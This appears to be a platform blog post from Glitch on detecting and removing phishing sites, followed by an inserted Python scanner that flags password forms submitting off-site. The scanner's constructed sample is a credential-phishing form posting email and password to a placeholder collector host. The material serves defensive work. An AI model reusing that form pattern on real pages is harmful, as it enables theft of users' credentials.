By Anil Dash

November 19, 2021

How we keep Glitch sites secure and trusted

Over the years, we’ve done a lot of work to make sure apps and sites that are published on Glitch are trustworthy. That’s our responsibility as a platform, but it’s also good for our community, as it means your apps will be part of a healthy, trustworthy ecosystem. It’s been a while since we’ve shared details of this work, so we wanted to share a high-level overview of how we think about the challenge. We've got some wins to celebrate, some lessons learned, and a clear sense of where our future challenges lie.

**TL;DR:** Glitch intentionally makes app creation as easy and open as possible, which means opening up to more potential misuses of the platform, including phishing sites. By working with a community of security researchers and our own user community, we've been able to significantly improve both our response time and our proactive action on removing potentially harmful content over the last year. Today, less than one half of one percent of new apps created on Glitch are flagged as being potentially harmful, with that statistic going down over time. And the mean time-to-resolution for reports of potential risk continues to improve, along with faster and more comprehensive suspension and blocking of users that create potentially harmful sites. We expect future challenges to come from phishing attempts that are built across multiple sites, and will be working with the other platforms in the ecosystem to address those threats as they arise.

Reducing Barriers

First, let’s consider what problem we’re trying to solve. Glitch is designed to make it as easy as possible to create full-stack websites without any barriers. In any system, reducing barriers to creation means it’s easier for bad actors to abuse those systems to make malicious creations. In our particular case, Glitch allows for creating web pages or apps without even logging in, so reducing potential abuse is even trickier than on platforms that rely on traditional authentication or login.

The next question that arises is: what kind of untrustworthy content could be created on Glitch? The primary concern here is the creation of phishing sites that are designed to capture users’ credentials or personal information. We’ve used a series of layered approaches to counter this risk over the years, with each building on the prior efforts. (This is a high-level overview so our community knows our philosophy on handling the problem, not an exhaustive technical review of all the efforts we’ve taken.)

Specific to the issue of malicious content on Glitch, we’ve found that, from a sampling of 50,000 projects created during November 2021, fewer than 0.3% were flagged as potentially harmful content by either our systems or the reports generated by our partners. We’re working to improve this further, but consider it a good sign of progress in addressing the issue.

With any security or trust domain, success in one area always results in the battleground shifting a bit to new areas. For example, while we initially focused on malicious full-stack apps as the biggest area of concern on Glitch, what we’ve found in more recent reports is that bad actors are increasingly using static resources (sometimes static HTML, sometimes other document formats like PDF) to try to capture credentials, often with the form itself submitting the captured data to other, larger providers like the giant cloud hosting platforms. These static resources are typically served as assets on Glitch, not as part of the core app hosting platform, so they send different signals from full-stack apps that might be potentially harmful.

We’ve worked with our partners to update our monitoring to accommodate these new vectors of attack, and initial results are promising, but what we take away from this learning is that we’ll increasingly see sophisticated attempts that go across multiple services, with Glitch (or part of Glitch’s infrastructure) being just one intermediary in a larger, networked effort. One recent such set of attempts was documented by DomainTools, which looked at these phishing attempts in depth, revealing both their attempted targets (businesses with employees working in the Middle East) and their intended mechanism of capturing data (compromised WordPress sites forwarding to an Outlook email address); both show the complexity of tracking these efforts across multiple services. While these patterns are well-established in the general web hosting industry, they're relatively new to Glitch as a community, and represent novel iterations on the pattern that will take time to fully prevent. We expect to have some advantages in this work over time by relying on the social aspects of our platform to help us better distinguish the small number of malicious actors on the platform from the millions of legitimate users.
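One defensive check suggested by the pattern described above (a static HTML asset whose credential form submits somewhere other than the site serving it), added here as an illustration and not code from Glitch or its partners: parse the asset, find forms containing a password field, and report any that post to a different host. The hostnames and HTML snippets are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class CredentialFormScanner(HTMLParser):
    """Record every <form> that contains a password field, along with its action URL."""

    def __init__(self):
        super().__init__()
        self._action = None        # action of the form currently open, if any
        self._has_password = False
        self.findings = []         # (action, has_password) for each form seen

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # HTMLParser lowercases names already
        if tag == "form":
            self._action, self._has_password = a.get("action", ""), False
        elif tag == "input" and self._action is not None:
            if a.get("type", "text").lower() == "password":
                self._has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self._action is not None:
            self.findings.append((self._action, self._has_password))
            self._action = None

    def close(self):
        super().close()
        if self._action is not None:        # an unterminated <form> still counts
            self.handle_endtag("form")


def offsite_credential_forms(html, hosting_host):
    """Return the hosts that password forms in `html` submit to, other than hosting_host.
    Relative actions (e.g. "/login") have no host and are treated as same-site."""
    scanner = CredentialFormScanner()
    scanner.feed(html)
    scanner.close()
    hosts = {urlparse(action).hostname for action, has_pw in scanner.findings if has_pw}
    return sorted(h for h in hosts if h and h != hosting_host)


# Constructed samples: ".example" and ".invalid" are reserved names, not real sites.
HOSTING_HOST = "my-site.example"
BENIGN_HTML = '<form action="/login" method="post"><input name="user">' \
              '<input type="password" name="pw"></form>'
SUSPICIOUS_HTML = '<h1>Sign in to view the shared document</h1>' \
                  '<form action="https://collector.invalid/submit" method="post">' \
                  '<input type="email" name="e"><input type="password" name="p"></form>'

if __name__ == "__main__":
    print(offsite_credential_forms(BENIGN_HTML, HOSTING_HOST))      # []
    print(offsite_credential_forms(SUSPICIOUS_HTML, HOSTING_HOST))  # ['collector.invalid']
```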

Overall, we’ve been grateful for the support of our community, including both our users who report potentially harmful apps, as well as the security researchers who provide infrastructure for proactively stopping bad actors. Over time, we’ve gotten better and better at reducing the amount of potential risk on Glitch, both in the absolute and as a percentage of what gets created on the platform every day. We are firmly committed to keeping creation and remixing on Glitch as open and accessible as possible, which means we’re also committed to being responsible for stopping the inevitable misuses that come along with that openness. And we’re glad to do it, because it means that Glitch gets to keep being a great, trusted place for you to make the most creative, interesting, innovative, and useful stuff on the web.